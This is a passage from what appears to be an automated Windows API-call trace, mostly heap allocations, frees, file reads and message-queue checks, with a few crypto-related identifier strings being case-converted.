out: hHeap=0x8a0000) returned 1 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0181.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0181.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0181.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0181.679] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0181.679] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xcb34, lpOverlapped=0x0) returned 1 [0181.682] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0181.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xcb34) returned 0xbea018 [0181.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0181.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0181.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0181.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xcb34) returned 0xbf6b58 [0181.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0181.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.684] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0181.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0181.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0181.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xcb34) returned 0xbea018 [0181.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0181.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0181.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0181.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0181.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0181.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0181.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0181.685] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0181.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0181.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xcb34) returned 0xbea018 [0181.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0181.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0181.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0181.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0181.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0181.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0181.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0181.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0181.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0181.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0181.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xcb34) returned 0xa5f008 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0181.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0181.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0181.689] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0181.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0181.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0181.690] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0181.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0181.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.690] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0181.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0181.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.691] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0181.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0181.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0181.692] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0181.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0181.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0181.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0181.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.693] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0181.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0181.694] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0181.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0181.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0181.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0181.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0181.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0181.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0181.695] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0181.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0181.695] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0181.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0181.695] HeapFree (in: hHeap=0x8a0000, 